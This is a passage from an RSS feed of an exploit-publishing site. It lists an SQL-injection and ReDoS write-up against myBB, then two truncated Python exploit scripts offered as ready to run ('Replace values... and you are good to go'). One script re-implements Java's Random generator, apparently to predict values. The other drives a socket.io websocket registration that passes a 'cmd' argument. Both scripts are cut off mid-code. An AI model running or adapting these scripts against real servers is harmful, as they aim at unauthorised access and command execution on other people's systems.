https://exploit.az/ Recent content on Exploit Azerbaijan Hugo en-us Sun, 24 Aug 2025 17:25:08 +0400 https://exploit.az/posts/wor/ Sun, 24 Aug 2025 17:25:08 +0400 https://exploit.az/posts/wor/ "Even a small key can open a big lock" Azerbaijani Proverb ---[ Index 1 - Introduction 2 - Tradition 2.1 - ReDoS, not the OS 2.2 - REGEXP, RLIKE and others 3 - How insecure, secure implementations are? 4 - Study Case: myBB 4.1 - Identification 4.2 - Perfect Match Against Sanitization 4.3 - Exploiting 5 - Acknowledgements 6 - References --[ 1 - Introduction For years, SQL Injection has been mostly about syntax-breaking payloads. https://exploit.az/posts/answers/ Sat, 16 Aug 2025 17:51:40 +0400 https://exploit.az/posts/answers/ Replace values to the ones you have and you are good to go! import time import requests import base64 import http.cookies from bs4 import BeautifulSoup from concurrent.futures import ThreadPoolExecutor import http.server import threading import random import urllib.parse import re class JavaRandom: def __init__(self, seed): self.seed = (seed ^ 0x5DEECE66D) & ((1 << 48) - 1) self.multiplier = 0x5DEECE66D self.addend = 0xB self.mask = (1 << 48) - 1 def next(self, bits): self. https://exploit.az/posts/docedit/ Sat, 16 Aug 2025 17:51:35 +0400 https://exploit.az/posts/docedit/ Replace values to the ones you have and you are good to go! import random import requests import re import websockets import asyncio def getSid(url): newUrl = url + '/socket.io/?EIO=3&transport=polling&t=PBNk2-7' s = requests.get(newUrl) match = re.search(r'sid":"(.*?)","upgra', s.text, re.DOTALL) sid = match.group().replace('sid":"', '').replace('","upgra','').strip() newUrl = url + f'/socket.io/?EIO=3&transport=polling&t=PBNk31Z&sid={sid}' s = requests.get(newUrl) return sid async def register(url, sid, uname, cmd): headers = {'Cookie:' : f'io={sid}'} wsUrl = url.replace('http://', 'ws://').replace('https://', 'wss://') + f'/socket.io/?EIO=3&transport=websocket&sid={sid}' async with websockets.